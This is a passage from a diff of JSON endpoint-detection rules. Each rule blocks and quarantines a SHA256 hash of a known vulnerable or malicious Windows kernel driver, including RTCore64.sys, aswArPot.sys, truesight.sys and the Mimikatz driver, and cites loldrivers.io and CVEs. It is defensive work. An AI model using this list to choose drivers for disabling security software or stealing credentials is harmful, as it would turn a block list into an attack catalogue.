+ "hl_testing_start_time": "2026-03-23T11:45:30.455858Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02f63773cdd991c891e10044633630154ae6fa63dbfe9b35082e48d4924f2dde",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cda14e89-71d0-5b27-8c5d-bb97ec72303a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480526Z",
+ "creation_date": "2026-03-23T11:45:30.480528Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1eff553cab0e6db50aa18e1ea10fbc9349b7529c938df4bed580f037cddd1309",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdab48d2-3808-58d5-b903-80adca284bde",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471684Z",
+ "creation_date": "2026-03-23T11:45:30.471687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471696Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1b41d6b91448e2409bb2f4fbf4aeb952adf373d0decc9d052277b89ba401407",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdad37a0-259d-5608-9317-2ed27294edee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816264Z",
+ "creation_date": "2026-03-23T11:45:30.816266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816271Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8eb1c821dbf56bde05c0c49f6d560021628df89c29192058ce68907e7048994",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdafbd2d-0afe-5cd6-85cc-0265ef6ca90e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156774Z",
+ "creation_date": "2026-03-23T11:45:31.156776Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156782Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b14e251fb2483ca4c555b4ec3ea204a04cfe2f08bdc54f27d8a0613df6a6e002",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdb1059b-1361-5cbd-9336-640d795cb6f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472463Z",
+ "creation_date": "2026-03-23T11:45:30.472466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "019c2955e380dd5867c4b82361a8d8de62346ef91140c95cb311b84448c0fa4f",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdb4fece-37fe-5512-a8c7-957e4b6b653c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608688Z",
+ "creation_date": "2026-03-23T11:45:29.608690Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608695Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df0536cdaac3ccc891ae2c41d176927ddee16b0ecdc3701e3eb96b0132917003",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdc4fb41-dc45-5953-8f3e-c3d10ed5611d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968792Z",
+ "creation_date": "2026-03-23T11:45:29.968794Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b2ad05939b0aabbdc011082fad7960baa0c459ec16a2b29f37c1fa31795a46d",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdc5ea31-cfb1-5f2f-9220-2c5adf36d768",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457507Z",
+ "creation_date": "2026-03-23T11:45:30.457510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db711ec3f4c96b60e4ed674d60c20ff7212d80e34b7aa171ad626eaa8399e8c7",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdcd8efe-f5df-5969-9372-256190f5479d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829929Z",
+ "creation_date": "2026-03-23T11:45:31.829931Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829937Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4efdce2a99b86911359011fa82c9752cfe37a69d078ed6077106cc8634ea786c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdceea7a-3c06-5b2b-b8ee-3449e6d36deb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605539Z",
+ "creation_date": "2026-03-23T11:45:29.605541Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605549Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff9b3fc49bb3cd9a2ffea2dd8075a34908346fb8393aa2bf13aa15ac72583928",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cde47c20-b24e-5659-9c6d-e01f6eb44a47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146044Z",
+ "creation_date": "2026-03-23T11:45:32.146046Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146052Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d590ee21ef889c847c8c80efe07f91cae4390d5663e6dc7a81077efce3737249",
+ "comment": "Malicious Kernel Driver (aka kavservice.bin) [https://www.loldrivers.io/drivers/77157886-00f9-4f6e-b217-d896813b630f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdeb9640-2df0-5908-80d3-7eeb3e36f452",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604301Z",
+ "creation_date": "2026-03-23T11:45:29.604303Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df101558cf68e3f50fb468248699e6f3938be7a893680bd4803fc2afe20bfd78",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdebcc04-f00e-5f6f-b555-f9852bc14ad4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818381Z",
+ "creation_date": "2026-03-23T11:45:30.818383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818388Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f13f6a4bf7711216c9e911f18dfa2735222551fb1f8c1a645a8674c1983ccea6",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdf5ec76-327d-51e9-9d74-dc6e47b0369d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816767Z",
+ "creation_date": "2026-03-23T11:45:30.816769Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816775Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7e5bd0090962b4f31e17ab3d1f97bd9870d23238b591a70e27a0c91db138f95",
+ "comment": "Vulnerable Kernel Driver (aka WiRwaDrv.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdf8f987-617c-5fd1-b67c-25252b9e76ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970990Z",
+ "creation_date": "2026-03-23T11:45:29.970993Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971001Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f902d78dada1658d688b1a8aac6ef48bdf968c859149f60f6c26e5b8af4656da",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cdfa3b3a-c6c9-58cd-8450-36efac53b6e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970864Z",
+ "creation_date": "2026-03-23T11:45:29.970867Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970891Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a9915ea7863a0d26c69402287a1afc8af360a5318b970d9b36f8820e5c9e568",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce0328e7-c8a3-5c55-9ef4-5dbb70a9e23f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460637Z",
+ "creation_date": "2026-03-23T11:45:30.460640Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08828990218ebb4415c1bb33fa2b0a009efd0784b18b3f7ecd3bc078343f7208",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce03db4f-19d3-548d-bf13-a59b2ebf70b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473862Z",
+ "creation_date": "2026-03-23T11:45:31.473866Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473894Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4aea15c43e587f43baa437ef48bd9c70f692a35ba9510537122fa60ae6439a78",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce0489ef-6d69-5586-9fef-01796631666d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836359Z",
+ "creation_date": "2026-03-23T11:45:30.836361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836367Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25ed1a52146816e02d41cf3938de7174806f58aad8f1e8c0ddc3801d20e60819",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce08f2c3-e400-57c2-8498-b7ed1db2dcab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620048Z",
+ "creation_date": "2026-03-23T11:45:29.620053Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "976c015b28197ccd15f807b776f705bdf612fc622fb0a4b9901b90f180bf2f8a",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce0a8a7a-2005-50b8-a2c5-aa16afd9d128",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817123Z",
+ "creation_date": "2026-03-23T11:45:30.817125Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4dc11b7922bf2674ca9673638e7fe4e26aceb0ebdc528e6d10c8676e555d7b2",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce198238-36b3-5b91-9ad2-33c4776d41f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817250Z",
+ "creation_date": "2026-03-23T11:45:30.817252Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817258Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5daa8fa3b5db2e6225a2effea41af95fe7ffc579550c4081c8028ed33bc023b8",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce1ae374-d2de-5dae-ab6d-d76f9028c869",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
